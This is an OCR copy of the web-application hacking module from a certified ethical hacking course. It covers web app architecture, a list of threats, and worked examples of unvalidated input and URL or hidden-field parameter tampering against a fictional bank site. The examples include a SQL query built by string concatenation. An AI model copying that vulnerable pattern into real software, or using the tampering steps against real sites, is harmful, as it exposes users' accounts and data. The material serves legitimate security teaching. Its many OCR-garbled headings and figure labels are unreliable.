CEHv8 Module 13 Hacking Web Applications PDF

Hacking Web Applications
Module 13
Ethical Hacking and Countermeasures Hacking Web Applications
Exam 312-50 Certified Ethical Hacker
H acking Web A pplications

Module 13
Engineered by Hackers. Presented by Professionals.
CEH
E th ic a l H ack in g and C ounterm easures v8
Module 13: Hacking Web Applications Exam 312-50
Module 13 Page 1724
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Security News
CEH
S e c u rity N e w s XSS Attacks Lead Pack As Most Frequent Attack Type

Source: http://www.darkreading.com Secure cloud hosting company, FireHost, has today announced the findings of its latest web application attack report, which provides statistical analysis of the 15 million cyber-attacks blocked by its servers in the US and Europe during Q3 2012. The report looks at attacks on the web applications, databases and websites of FireHost's customers between July and September, and offers an impression of the current internet security climate as a whole. Amongst the cyber-attacks registered in the report, FireHost categorises four attack types in particular as representing the most serious threat. These attack types are among FireHost's 'Superfecta' and they consist of Cross-site Scripting (XSS), Directory Traversals, SQL Injections, and Cross-site Request Forgery (CSRF). One of the most significant changes in attack traffic seen by FireHost between Q2 and Q3 2012 was a considerable rise in the number of cross-site attacks, in particular XSS and CSRF attacks rose to represent 64% of the group in the third quarter (a 28% increased penetration). XSS is now the most common attack type in the Superfecta, with CSRF now in second. FireHost's servers blocked more than one million XSS attacks during this period alone, a figure which rose
Module 13 Page 1725
69%, from 603,016 separate attacks in Q2 to 1,018,817 in Q3. CSRF attacks reached second place on the Superfecta at 843,517. Cross-site attacks are dependent upon the trust developed between site and user. XSS attacks involve a web application gathering malicious data from a user via a trusted site (often coming in the form of a hyperlink containing malicious content), whereas CSRF attacks exploit the trust that a site has for a particular user instead. These malicious security exploits can also be used to steal sensitive information such as user names, passwords and credit card details - without the site or user's knowledge. The severity of these attacks is dependent on the sensitivity of the data handled by the vulnerable site and this ranges from personal data found on social networking sites, to the financial and confidential details entered on ecommerce sites amongst others. A great number of organisations have fallen victim to such attacks in recent years including attacks on PayPal, Hotmail and eBay, the latter falling victim to a single CSRF attack in 2008 which targeted 18 million users of its Korean website. Furthermore in September this year, IT giants Microsoft and Google Chrome both ran extensive patches targeted at securing XSS flaws, highlighting the prevalence of this growing online threat. "Cross-site attacks are a severe threat to business operations, especially if servers aren't properly prepared," said Chris Hinkley, CISSP - a Senior Security Engineer at FireHost. "It's vital that any site dealing with confidential or private user data takes the necessary precautions to ensure applications remain protected. Locating and fixing any website vulnerabilities and flaws is a key step in ensuring your business and your customers, don't fall victim to an attack of this nature. The consequences of which can be significant, in terms of both financial and reputational damage." The Superfecta attack traffic for Q3 2012 can be broken down as follows: As with Q2 2012, the majority of attacks FireHost blocked during the third calendar quarter of 2012 originated in the United States (llm illion / 74%). There has however, been a great shift in the number of attacks originating from Europe this quarter, as 17% of all malicious attack traffic seen by FireHost came from this region. Europe overtook Southern Asia (which was responsible for 6%), to become the second most likely origin of malicious traffic. Varied trends among the Superfecta attack techniques are demonstrated between this quarter and last: During the build up to the holiday season, ecommerce activity ramps up dramatically and cyber-attacks that target website users' confidential data are also likely to increase as a result. As well as cross-site attacks, the other Superfecta attack types, SQL Injection and Directory Transversal, still remain a significant threat despite a slight reduction in frequency this quarter. Ecommerce businesses need to be aware of the risks that this period may present it to its security, as Todd Gleason, Director of Technology at FireHost explains, "You'd better believe that hackers will try and take advantage of any surges in holiday shopping. They will be devising a number of ways they can take advantage of any web application vulnerabilities and will use an assortment of different attack types and techniques to do so. When it's a matter of
Module 13 Page 1726
confidential data at risk, including customer's financial information - credit card and debit card details - there's no room for complacency. These organisations need to know that there's an increased likelihood of attack during this time and it's their responsibility to take the necessary steps to stop such attacks."
Copyright 2013 U B M Tech, All rights reserved

http://www.darkreading.com/securitv/news/2400095Q8/firehost-q3-web-application-report-xssattacks-lead-pack-as-most-frequent-attack-type.html
Module 13 Page 1727
M odule O bjectives
J J J J J J J J J How Web Applications Work Web Attack Vectors Web Application Threats Web App Hacking Methodology Footprint Web Infrastructure Hacking WebServers Analyze Web Applications Attack Authentication Mechanism Attack Authorization Schemes 1/ ^ J J J J J J J J J Session Management Attack Attack Data Connectivity Attack Web App Client Attack Web Services Web Application Hacking Tools Countermeasures Web Application Security Tools Web Application Firewall Web Application Pen Testing
CEH
Copyright by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited.
M o d u le O b je c tiv e s
The main objective of this module is to show the various kinds of vulnerabilities that can be discovered in web applications. The attacks exploiting these vulnerabilities are also highlighted. The module starts with a detailed description of the web applications. Various web application threats are mentioned. The hacking methodology reveals the various steps involved in a planned attack. The various tools that attackers use are discussed to explain the way they exploit vulnerabilities in web applications. The countermeasures that can be taken to thwart any such attacks are also highlighted. Security tools that help network administrator to monitor and manage the web application are described. Finally web application pen testing is discussed. This module familiarizes you with:
Module 13 Page 1728
How Web Applications Work Web Attack Vectors

A
S S s S S s s S
Session Management Attack Attack Data Connectivity Attack Web App Client Attack Web Services Web Application Hacking Tools Countermeasures Web Application Security Tools Web Application Firewall Web Application Pen Testing
Web Application Threats Web App Hacking Methodology Footprint Web Infrastructure
A A
Hacking Webservers Analyze Web Applications Attack Authentication Mechanism Attack Authorization Schemes
Module 3 Page 1729
Ethical Hacking and Countermeasures Copyright by ECC0UI1Cil All Rights Reserved. Reproduction is Strictly Prohibited.
Copyright by E&Coinal. All Rights Reserved. Reproduction is Strictly Prohibited.
M o d u le F lo w
Web applications are the application programs accessed only with Internet connection enabled. These applications use HTTP as their primary communication protocol. Generally, the attackers target these apps for several reasons. They are exposed to various attacks. For clear understanding of the "hacking web applications" we divided the concept into various sections. Web App Concepts Web App Threats Hacking Methodology Web Application Hacking Tools Countermeasures Security Tools Web App Pen Testing Let us begin with the Web App concepts.
Module 13 Page 1730
^^
Web App Pen Testing
Web App Concepts
Security Tools
Web App Threats
Countermeasures
Hacking Methodology
Web Application Hacking Tools
This section introduces you to the web application and its components, explains how the web application works, and its architecture. It provides insight into web 2.0 application, vulnerability stacks, and web attack vectors.
Module 13 Page 1731
Web Application Security Statistics
C EH
Cross-Site Scripting Information Leakage
Copyright by EtC tin o l. All Rights Reserved. Reproduction is Strictly Prohibited.
m ~
W e b A p p lic a tio n S e c u rity S ta tis tic s

Source: https://www.whitehatsec.com
According to the WHITEHAT security website statistics report in 2012, it is clear that the crosssite scripting vulnerabilities are found on more web applications when compared to other vulnerabilities. From the graph you can observe that in the year 2012, cross-site scripting vulnerabilities are the most common vulnerabilities found in 55% of the web applications. Only 10% of web application attacks are based on insufficient session expiration vulnerabilities. In order to minimize the risks associated with cross-site scripting vulnerabilities in the web applications, you have to adopt necessary countermeasures against them.
Module 13 Page 1732
W O
Cross-Site Scripting Information Leakage
a > 4 Q
I H
Content Spoofing Insufficient Authorization L Cross-Site Request Forgery Brute Force Predictable Resource Location SQL Injection 10% Session Fixation Insufficient Session Expiration
o
0
C 16%
a.
a
1
10
20
FIGURE 13.1: WHITEHAT SECURITY WEBSITE STATISTICS REPORT, 2012
Module 13 Page 1733
Ethical Hacking and Countermeasures Copyright by EC-C0l1nCil All Rights Reserved. Reproduction is Strictly Prohibited.
Introduction to Web Applications

Web applications provide an interface between end users and webservers through a set of web pages that are generated at the server end or contain script code to be executed dynamically within the client web browser
C EH
Though web applications enforce certain security policies, they are vulnerable to various attacks such as SQL injection, cross-site scripting, session hijacking, etc.
* ,
Web applicationsand Web 2.0 technologies are invariably used to support critical business functions such as CRM, SCM, etc. and improve business efficiency
New web technologies such as Web 2.0 provide more attack surface for web application exploitation
Copyright by E&C01nal. All Rights Reserved. Reproduction is Strictly Prohibited.
In tro d u c tio n to W e b A p p lic a tio n s

Web applications are the application that run on the remote web server and send the output over the Internet. Web 2.0 technologies are used by all the applications based on the web-based servers such as communication with users, clients, third-party users, etc. A web application is comprised of many layers of functionality. However, it is considered a three-layered architecture consisting of presentation, logic, and data layers. The web architecture relies substantially on the technology popularized by the World Wide Web, Hypertext Markup Language (HTML), and the primary transport medium, e.g. Hyper Text Transfer Protocol (HTTP). HTTP is the medium of communication between the server and the client. Typically, it operates over TCP port 80, but it may also communicate over an unused port. Web applications provide an interface between end users and web servers through a set of web pages that are generated at the server end or contain script code to be executed dynamically within the client web browser. Some of the popular web servers present today are Microsoft IIS, Apache Software Foundation's Apache HTTP Server, AOL/Netscape's Enterprise Server, and Sun One. Resources are called Uniform Resource Identifiers (URIs), and they may either be static pages or contain dynamic content. Since HTTP is stateless, e.g., the protocol does not maintain a session state,
Module 13 Page 1734
the requests for resources are treated as separate and unique. Thus, the integrity of a link is not maintained with the client. Cookies can be used as tokens, which servers hand over to clients to allow access to websites. However, cookies are not perfect from a security point of view because they can be copied and stored on the client's local hard disk, so that users do not have to request a token for each query. Though web applications enforce certain security policies, they are vulnerable to various attacks such as SQL injection, cross-site scripting, session hijacking, etc. Organizations rely on web applications and Web 2.0 technologies to support key business processes and improve performance. New web technologies such as Web 2.0 provide more attack surface for web application exploitation. Attackers use different types of vulnerabilities that can be discovered in web applications and exploit them to compromise web applications. Attackers also use tools to launch attacks on web applications.
Module 13 Page 1735
Web Application Components
U rtifw d itfcM jl N M h M
C EH
1
IS
W e b A p p lic a tio n C o m p o n en ts
The components of web applications are listed as follows
Login: Most of the websites allow authentic users to access the application by means of login. It means that to access the service or content offered by the web application user needs to submit his/her username and password. Example gmail.com The Web Server: It refers to either software or hardware intended to deliver web content that can be accessed through the Internet. An example is the web pages served to the web browser by the web server. Session Tracking Mechanism: Each web application has a session tracking mechanism. The session can be tracked by using cookies, URL rewriting, or Secure Sockets Layer (SSL) information. User Permissions: When you are not allowed to access the specified web page in which you are logged in with user permissions, you may redirect again to the login page or to any other page. The Application Content: It is an interactive program that accepts web requests by clients and uses the parameters that are sent by the web browser for carrying out certain functions. Data Access: Usually the web pages will be contacting with each other via a data access library in which all the database details are stored.
Module 13 Page 1736
The Data Store: It is a way to the important data that is shared and synchronized between the children/threats. This stored information is quite important and necessary for higher levels of the application framework. It is not mandatory that the data store and the web server are on the same network. They can be in contact or accessible with each other through the network connection. Role-level System Security Application Logic: Usually web applications are divided into tiers of which the application logic is the middle tier. It receives the request from the web browser and gives it services accordingly. The services offered by the application logic include asking questions and giving the latest updates against the database as well as generating a user interface. Logout: An individual can shut down or log out of the web application or browser so that the session and the application associated with it end. The application ends either by taking the initiative by the application logic or by automatically ending when the servlet session times out.
Module 13 Page 1737
How Web Applications Work
CEH
ID 6329
Topic Tech
News
SELECT * from news where id = 6329
CNN
O u tp u t
H o w W e b A p p lic a tio n s W o rk
Whenever someone clicks or types in the browser, immediately the requested website or content is displayed on the screen of the computer, but what is the mechanism behind this? This is the step-by-step process that takes place once a user sends a request for particular content or a website where multiple computers are involved. The web application model is explained in three layers. The first layer deals with the user input through a web browser or user interface. The second layer contains JSP (Java servlets) or ASP (Active Server Pages), the dynamic content generation technology tools, and the last layer contains the database for storing customer data such as user names and passwords, credit card details, etc. or other related information. Let's see how the user triggers the initial request through the browser to the web application server: First the user types the website name or URL in the browser and the request is sent to the web server. On receiving the request ,the web server checks the file extension: If the user requests a simple web page with an HTM or HTML extension, the web server processes the request and sends the file to the user's browser.
Module 13 Page 1738
If the user requests a web page with the extension CFM, CFML, or CFC, then the request must be processed by the web application server. Therefore, the web server passes the user's request to the web application server. The user's request is now processed by the web application server. In order to process the user's request, the web server accesses the database placed at the third layer to perform the requested task by updating or retrieving the information stored on the database. Once done processing the request, web application server sends the results to the web server, which in turn sends the results to the user's browser.
User
Login Form
Internet
Firewall
Web Server
FIGURE 13.2: Working of Web Application
Module 13 Page 1739
Web Application Architecture

y ^ lln t e m e r N
C EH
Clients
Web Services
Business Layer
Application Server
J2EE XCode
.NET C++
COM COM+
Business Logic
Legacy Application Data Access
Presentation Layer
Firewall HTTP Request Parser
Proxy Server, Cache
Servlet Container
Resource Handler
A uthentication and Login
W e b A p p lic a tio n A rc h ite c tu re

All web applications execute with the help of the web browser as a support client. The web applications use a group of server-side scripts (ASP, PHP, etc.) and client-side scripts (HTML, JavaScript, etc.) to execute the application. The information is presented by using the client-side script and the hardware tasks such as storing and gathering required data by the server-side script. In the following architecture, the clients uses different devices, web browsers, and external web services with the Internet to get the application executed using different scripting languages. The data access is handled by the database layer using cloud services and a database server.
Module 13 Page 1740
Clients
,
Business Layer
W eb Browser
Presentation
US
S m a rt P h o n e s , W e b A p p lia n c e
layer F la s h . S ilv e rllfh t. Ja v aS c rip (
-v
Application Server
___
J2EE XCode .NET C + COM COM Business logic
P E x te rn ! W e b S e rv ic e !
legacy Application Data Access
Web Server
Prssantation Layer
F ire w a ll H T T PR e q u e s tP a rs e r S e rv le t C o n ta in e r R e s o u rc e H a n d le r
Proxy Server, Cache
Database Layer
Cloud Services
A u th e n tic a tio n a n dL o g in
Database Server
FIGURE 13.3: Web Application Architecture
Module 13 Page 1741
Web 2.0 A pplications

J
Blogs (Wordpress) Q New technologies like AJAX (Gmail, YouTube) Q Advanced gaming
Crt1fW 4
CEH
itfciul NM kM
Web 2.0 refers to a new generation of Web applications that provide an infrastructure for more dynamic user participation, social interaction and collaboration
Dynamic as opposed to static site content
Mobile application (iPhone)
RSS-generated syndication
Flash rich interface websites O
O'
'
Social networking sites (Flickr, Facebook, del.cio.us)
Frameworks (Yahool Ul Library, jQuery)
Q f
Mash-ups (Emails, IMs, Electronic payment systems)
Cloud computing websites like W (amazon.com) ^ Interactive encyclopedias and dictionaries
O O
Q
Wikis and other collaborative applications
ine office software (Google Docs and Microsoft light)
Google Base and other free Web services (Google Maps)
Ease of data creation, modification, or deletion by individual users

W e b 2.0 A p p lic a tio n s

Web 2.0 refers to a new generation of web applications that provide an infrastructure for more dynamic user participation, social interaction, and collaboration. It offers various features such as: Advanced gaming Dynamic as opposed to static site content RSS-generated syndication Social networking sites (Flickr, Facebook, del.cio.us) Mash-ups (emails, IMs, electronic payment systems) Wikis and other collaborative applications Google Base and other free web services (Google Maps) Ease of data creation, modification, or deletion by individual users Online office software (Google Docs and Microsoft Light) Interactive encyclopedias and dictionaries Cloud computing websites such as Amazon.com
Module 13 Page 1742
Frameworks (Yahoo! Ul Library, j Query)
Flash-rich interface websites Mobile application (iPhone) Q New technologies like AJAX (Gmail, YouTube)
Blogs (Wordpress)
Module 13 Page 1743
V ulnerability Stack
Custom Web Applications
CEH
Business Logic Flaws Technical Vulnerabilities Open Source / Commercial
Third Party Components
B El
_
_
E
f^ wr
Database
Oracle / MySQL / MS SQL
Web Server
Apache / Microsoft IIS

Apache
Operating System
Windows / Linux
/OSX
Router / Switch
Network
Security
IPS / IDS
V u ln e r a b ility S ta ck
The web applications are maintained and accessed through various levels that include: custom web applications, third-party components, databases, web servers, operating systems, networks, and security. All the mechanisms or services employed at each level help the user in one or the other way to access the web application securely. When talking about web applications, security is a critical component to be considered because web applications are a major sources of attacks. The following vulnerability stack shows the levels and the corresponding element/mechanism/service employed at each level that makes the web applications vulnerable:
i f -
Module 13 Page 1744
Custom Web Applications
Business Logic Flaws Technical Vulnerabilities Open Source / Commercial
Third Party Components
Oracle / MySQL / MS SQL
Apache / Microsoft IIS Windows / Linux /O S X Router / Switch
Security
IPS /IDS
FIGURE 13.4: Vulnerability Stack
Module 13 Page 1745
Web A ttack Vectors

w An attack vector is a path or means by which an attacker can gain access to computer or network resources in order to deliver an attack payload or cause a malicious outcome
CEH
Attack vectors include parameter manipulation, XML poisoning, client validation, server misconfiguration, web service routing issues, and cross-site scripting
Security controls need to be updated continuously as the attack vectors keep changing with respect to a target of attack
W e b A tta c k V e cto rs
An attack vector is a method of entering into to unauthorized systems to performing malicious attacks. Once the attacker gains access into the system or the network he or she delivers an attack payload or causes a malicious outcome. No protection method is completely attack-proof as attack vectors keep changing and evolving with new technological changes. Examples of various types of attack vectors: Parameter manipulation: Providing the wrong input value to the web services by the attacker and gaining the control over the SQL, LDAP, XPATH, and shell commands. When the incorrect values are provided to the web services, then they become vulnerable and are easily attacked by web applications running with web services. 0 XML poisoning: Attackers provide manipulated XML documents that when executed can disturb the logic of parsing method on the server. When huge XMLs are executed at the application layer, then they can be easily be compromised by the attacker to launch his or her attack and gather information.
Client validation: Most client-side validation has to be supported by server-side authentication. The AJAX routines can be easily manipulated, which in turn makes a way for attackers to handle SQL injection, LDAP injection, etc. and negotiate the web application's key resources.
Module 13 Page 1746
Server Misconfiguration: The attacker exploits the vulnerabilities in the web servers and tries to break the validation methods to get access to the confidential data stored on the servers. Web service routing issues: The SOAP messages are permitted to access different nodes on the Internet by the WS-Routers. The exploited intermediate nodes can give access to the SOAP messages that are communicated between two endpoints. Cross-site scripting: Whenever any infected JavaScript code is executed, then the targeted browsers can be exploited to gather information by the attacker.
Module 13 Page 1747
M o d u le F lo w
Web applications are targeted by attackers for various reasons. The first issue is quality of the source code as related to security is poor and another issue is an application with "complex setup." Due to these loopholes, attackers can easily launch attacks by exploiting them. Now we will discuss the threats associated with web applications.
Web App Pen Testing
Web App Concepts
m
Jk
Security Tools
Web App Threats
Countermeasures
e s Hacking Methodology 1S>
B#
Module 13 Page 1748
This section lists and explains the various web application threats such as parameter/form tampering, injection attacks, cross-site scripting attacks, DoS attacks, session fixation attacks, improper error handling, etc.
Module 13 Page 1749
Web Application Threats 1

Information Leakage Cookie Poisoning Broken Account Management
CEH
(lllfwtf ttfciul NM hM
Storage
Improper Error Handling
Cop> ight by EC-Cauacil. A ll Rights Reserved. Reproduction is S trictly Prohibited.
W e b A p p lic a tio n T h reats-1

Web application threats are not limited to attacks based on URL and port80. Despite using ports, protocols, and the OSI layer, the integrity of mission-critical applications must be protected from possible future attacks. Vendors who want to protect their products' applications must be able to deal with all methods of attack. The various types of web application threats are as follows:
C ookie P o iso n in g
By changing the information inside the cookie, attackers bypass the authentication process and once they gain control over the network, they can either modify the content, use the system for the malicious attack, or steal information from the user's system.
D irecto ry T ra v e rsa l
Attackers exploit HTTP by using directory traversal and they will be able to access restricted directories; they execute commands outside of the web server's root directory.
U n v alid ated In p u t
In order to bypass the security system, attackers tamper with the http requests, URL, headers, form fields, hidden fields, query strings etc. Users' login IDs and other related
Module 13 Page 1750 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
data gets stored in the cookies and this becomes a source of attack for the intruders. Attackers gain access to the victim's system using the information present in cookies. Examples of attacks caused by unvalidated input include SQL injection, cross-site scripting (XSS), buffer overflows, etc.
C ro ss-site S cripting (XSS)

" i T f An attacker bypasses the clients ID security mechanism and gains access privileges, and then injects malicious scripts into the web pages of a particular website. These malicious scripts can even rewrite the HTML content of the website.
In je c tio n F law s
Injection flaws are web application vulnerabilities that allow untrusted data to be interpreted and executed as part of a command or query.
SQL In je c tio n
This is a type of attack where SQL commands are injected by the attacker via input data; then the attacker can tamper with the data.
This type of tampering attack is intended to manipulating the parameters exchanged between client and server in order to modify application data, such as user credentials and permissions, price and quantity of products, etc. This information is actually stored in cookies, hidden form fields, or URL Query Strings, and is used to increase application functionality and control. Man in the middle is one of the examples for this type of attack. Attackers use tools like Web scarab and Paros proxy for these attacks. M ||M ' ' t __ i__ A denial-of-service attack is an attacking method intended to terminate the operations of a website or a server and make it unavailable to intended users. For instance, a website related to a bank or email service is not able to function for a few hours to a few days. This results in loss of time and money.
P a ra m e te r/F o rm T a m p e rin g
D enial-of-S ervice (DoS)
B roken A ccess C ontrol

Broken access control is a method used by attackers where a particular flaw has been identified related to the access control, where authentication is bypassed and the attacker compromises the network.
V A ///
C ro ss-site R eq u est F o rg ery
The cross-site request forgery method is a kind of attack where an authenticated user in made to perform certain tasks on the web application that an attackers chooses. For example, a user clicking on a particular link sent through an email or chat.
In fo rm atio n L e a k a g e
Information leakage can cause great losses for a company. Hence, all sources such as
Module 13 Page 1751
systems or other network resources must be protected from information leakage by employing proper content filtering mechanisms.
Im p ro p e r E rror H an d lin g
It is necessary to define how the system or network should behave when an error occurs. Otherwise, it may provide a chance for the attacker to break into the system. Improper error handling may lead to DoS attacks.
Log T a m p e rin g
Logs are maintained by web applications to track usage patterns such as user login credentials, admin login credentials, etc. Attackers usually inject, delete, or tamper with web application logs so that they can perform malicious actions or hide their identities.
Buffer O verflow
A web application's buffer overflow vulnerability occurs when it fails to guard its buffer properly and allows writing beyond its maximum size.
B roken Session M a n a g e m e n t
When security-sensitive credentials such as passwords and other useful material are not properly taken care, these types of attacks occur. Attackers compromise the credentials through these security vulnerabilities.
S ecurity M isc o n fig u ra tio n

Developers and network administrators should check that the entire stack is configured properly or security misconfiguration can happen at any level of an application stack, including the platform, web server, application server, framework, and custom code. Missing patches, misconfigurations, use of default accounts, etc. can be detected with the help of automated scanners that attackers exploit to compromise web application security.
B roken A ccount M a n a g e m e n t
----- Even authentication schemes that are valid are weakened because of vulnerable account management functions including account update, forgotten or lost password recovery or reset, password changes, and other similar functions.
In s e c u re S torage
Web applications need to store sensitive information such as passwords, credit card numbers, account records, or other authentication information somewhere; possibly in a database or on a file system. If proper security is not maintained for these storage locations, then the web application may be at risk as attackers can access the storage and misuse the information stored. Insecure storage of keys, certificates, and passwords allow the attacker to gain access to the web application as a legitimate user.
Module 13 Page 1752
Web Application Threats 2

Platform Exploits Insecure Direct Object References Insecure Cryptographic Storage Insufficient Transport Layer Protection
C EH
V
v 1
Failure to Restrict URL Access
Obfuscation Application DMZ Protocol Attacks Security Management Exploits
Authentication Hijacking
Web Services Attacks
Unvalidated Redirects and Forwards Session Fixation Attack
&
Malicious File Execution
W e b A p p lic a tio n T h re a ts 2 Platform Exploits

Various web applications are built on by using different platforms such as BEA Web logic and ColdFusion. Each platform has various vulnerabilities and exploits associated with it.
When various internal implementation objects such as file, directory, database record, or key are exposed through a reference by a developer, then the insecure direct object reference takes place. For example, where a bank account number is made a primary key, then there is a good change it can be compromised by the attacker based on such references.
in
In s e c u re D ire c t O b je c t R e fe re n c e s
In s e c u re C ry p to g ra p h ic Sto rag e
When sensitive data has been stored in the database, it has to be properly encrypted using cryptography. A few cryptographic encryption methods developed by developers are not up to par. Cryptographically very strong encryption methods have to be used. At the same time, care must be taken to store the cryptographic keys. If these keys are stored in insecure places, then the attacker can obtain them easily and decrypt the sensitive data.
Module 13 Page 1753
A u th en ticatio n H ijack in g
In order to identify the user, every web application uses user identification such as a user ID and password. Once the attacker compromises the system, various malicious things like theft of services, session hijacking, and user impersonation can occur.
N etw ork A ccess A ttacks

Network access attacks can majorly impact web applications. These can have an effect on basic level of services within an application and can allow access that standard HTTP application methods would not have access to. fill 1 1=
C ookie Snooping
Attackers use cookie snooping on a victim's system to analyze their surfing habits and sell that information to other attackers or may use this information to launch various attacks on the victim's web applications. =
W eb S ervices A ttacks
Web services are process-to-process communications that have special security issues and needs. An attacker injects a malicious script into a web service and is able to disclose and modify application data.
-^
In su ffic ien t T ra n sp o rt L ay er P ro tectio n
SSL/TLS authentications should be used for authentication on websites or the attacker can monitor network traffic to steal an authenticated user's session cookie. Various threats such as account theft, phishing attacks, and admin accounts may happen after systems are being compromised. I
H idden M an ip u latio n
These types of attacks are mostly used by attackers to compromise e-commerce websites. Attackers manipulate the hidden fields and change the data stored in them. Several online stores face this type of problem every day. Attackers can alter prices and conclude transactions with the prices of their choice.
DMZ P rotocol A ttacks

The DMZ (Demilitarized Zone) is a semi-trusted network zone that separates the untrusted Internet from the company's trusted internal network. An attacker who is able to compromise a system that allows other DMZ protocols has access to other DMZs and internal systems. This level of access can lead to: Compromise of the web application and data Q Defacement of websites to internal systems, including databases, backups, and source code
Access
Module 13 Page 1754
U n v alid ated R e d ire c ts a n d F o rw ard s

_____ Attackers make a victim click an unvalidated link that appears to be a valid site. Such redirects may attempt to install malware or trick victims into disclosing passwords or other sensitive information. Unsafe forwards may allow access control bypass leading to: Session fixation attacks Security management exploits Failure to restrict URL access Malicious file execution
F a ilu re to R e stric t URL A ccess

An app ication often safeguards or protects sensitive functionality and prevents the displays of links or URLs for protection. Attackers access those links or URLs directly and perform illegitimate operations.
O b fu scatio n A p p lication
Attackers usually work hard at hiding their attacks and to avoid detection. Network and host intrusion detection systems (IDSs) are constantly looking for signs of wellknown attacks, driving attackers to seek different ways to remain undetected. The most common method of attack obfuscation involves encoding portions of the attack with Unicode, UTF-8, or URL encoding. Unicode is a method of representing letters, numbers, and special characters so these characters can be displayed properly, regardless of the application or underlying platform in which they are used.
S ecurity M a n a g e m e n t E xploits
Some attackers target security management systems, either on networks or on the application layer, in order to modify or disable security enforcement. An attacker who exploits security management can directly modify protection policies, delete existing policies, add new policies, and modify applications, system data, and resources.
_L* Session F ixation A ttack

______ In a session fixation attack, the attacker tricks or attracts the user to access a legitimate web server using an explicit session ID value.
M alicio u s F ile E xecution

Malicious file execution vulnerabilities had been found on most applications. The cause of this vulnerability is because of unchecked input into the web server. Due to this unchecked input, the files of attackers are easily executed and processed on the web server. In addition, the attacker performs remote code execution, installs the rootkit remotely, and in at least some cases, takes complete control over the systems. ___
Module 13 Page 1755
U nvalidated In p u t
Input validation flaws refers to a web application vulnerability where input from a client is not validated before being processed by web applications and backend servers
CEH
An attacker exploits input validation flaws to perform cross-site scripting, buffer overflow, injection attacks, etc. that result in data theft and system malfunctioning
Boy.com
Database
Browser input not validated by the web : application
http://juggyboy.com/login.aspx ?user=jasons0pass=sprxngfield
Browser Post Request
s trin g sql ,,s e le c t * from Users where user = " + User. Text + and pwd= + Password.Text + ! r Modified Query
U n v a lid a te d In p u t
An input validation flaw refers to a web application vulnerability where input from a client is not validated before being processed by web applications and backend servers. Sites try to protect themselves from malicious attacks through input filtration, but there are various methods prevailing for the the purpose of encoding. Many http inputs have multiple formats that make filtering very difficult. The canonicalization method is used to simplify the encodings and is useful in avoiding various vulnerable attacks. Web applications use only a client-side mechanism in input validation and attackers can easily bypass it. In order to bypass the security system, attackers tamper the http requests, URLs, headers, form fields, hidden fields, and query strings. Users login IDs and other related data gets stored in the cookies and this becomes a source of attack for intruders. Attackers gain access to the systems by using the information present in the cookies. Various methods used by hackers are SQL injection, cross-site scripting (XSS), buffer overflows, format string attacks, SQL injection, cookie poisoning, and hidden field manipulation that result in data theft and system malfunctioning.
Module 13 Page 1756
Database
: Browser input not : validated by the web : application
http://juggyboy.com/login.aspx ?user=jasons@pass=springfield
Browser Post Request
Wtmmrnmr*
s t r in g sq l ,,s e le c t * from Users where user = ' + User.Text + ' and pwd=1 + Password.Text + " ' " r M odified Query
Figure 13.5: Unvalidated Input
Module 13 Page 1757
Param eter/Form Tampering

J A web parameter tampering attack involves the manipulation of parameters exchanged between client and server in order to modify application data such as user credentials and permissions, price, and quantity of products A parameter tampering attack exploits vulnerabilities in integrity and logic validation mechanisms that may result in XSS, SQL injection, etc.
U rt1 fw 4 ilhiul lU th M
CEH
______ . - - .
0 (D |
1 Tampering with the URL parameters | 1
http://www.juggybank.com/cust.asp?profile=21&debit=2500 <......J 0 @ 1
http://www.juggybank.com/cust.asp?profile=82&debtt=lSO O <......J1 .... .......
http://www.juggybank.com/stat.asp?pg=531&status=view
< ........
Other parameters can be changed including attribute parameters
0
| http://www.juggybank.com/stat.asp?pg-147&status delete <
P a ra m e te r/ F o rm T a m p e rin g
Parameter tampering is a simple form of attack aimed directly at the application's business logic. This attack takes advantage of the fact that many programmers rely on hidden or fixed fields (such as a hidden tag in a form or a parameter in an URL) as the only security measure for certain operations. To bypass this security mechanism, an attacker can change these parameters. Detailed Description Serving the requested files is the main function of web servers. During a web session, parameters are exchanged between the web browser and the web application in order to maintain information about the client's session, which eliminates the need to maintain a complex database on the server side. URL queries, form fields, and cookies are used to pass the parameters. Changed parameters in the form field are the best example of parameter tampering. When a user selects an HTML page, it is stored as a form field value, and transferred as an HTTP page to the web application. These values may be pre-selected (combo box, check box, radio buttons, etc.), free text, or hidden. An attacker can manipulate these values. In some extreme cases, it is just like saving the page, editing the HTML, and reloading the page in the web browser. r-
Module 13 Page 1758
Hidden fields that are invisible to the end user provide information status to the web application. For example, consider a product order form that includes the hidden field as follows: <input type="hidden" name="price" value="99. 90"> Combo boxes, check boxes, and radio buttons are examples of pre-selected parameters used to transfer information between different pages, while allowing the user to select one of several predefined values. In a parameter tampering attack, an attacker may manipulate these values. For example, consider a form that includes the combo box as follows: <FORM METHOD=POST ACTION="xferMoney. asp> Source Account: <SELECT NAME="SrcAcc"> <OPTION VALUE=" 123456789">******789</OPTION> <OPTION VALUE="868686868">******868</OPTIONX/SELECT> <BR>Amount: <INPUT NAME="Amount" SIZE=20> <BR>Destination Account: <INPUT NAME="DestAcc" SIZE=40> <BRXINPUT TYPE=SUBMIT> <INPUT TYPE=RESET> </FORM> Bypassing An attacker may bypass the need to choose between two accounts by adding another account into the HTML page source code. The new combo box is displayed in the web browser and the attacker can choose the new account. HTML forms submit their results using one of two methods: GET or POST. In the GET method, all form parameters and their values appear in the query string of the next URL, which the user sees. An attacker may tamper with this query string. For example, consider a web page that allows an authenticated user to select one of his or her accounts from a combo box and debit the account with a fixed unit amount. When the submit button is pressed in the web browser, the URL is requested as follows: http://www.iuggvbank.com/cust.asp?profile=21&debit=2500 An attacker may change the URL parameters (profile and debit) in order to debit another account: http://www.iuggybank.com/cust.asp?profile=82&debit=1500 There are other URL parameters that an attacker can modify, including attribute parameters and internal modules. Attribute parameters are unique parameters that characterize the behavior of the uploading page. For example, consider a content-sharing web application that enables the content creator to modify content, while other users can only view the content. The web server checks whether the user who is accessing an entry is the author or not (usually by cookie). An ordinary user will request the following link: http://www.iuggybank.com/stat.asp?pg=531&status=view
Module 13 Page 1759
An attacker can modify the status parameter to delete in order to delete permission for the content. http://www.iuggybank.com/stat.asp?pg=147&status=delete Parameter/form tampering can lead to theft of services, escalation of access, session hijacking, and assuming the identity of other users as well as parameters allowing access to developer and debugging information.
[G O
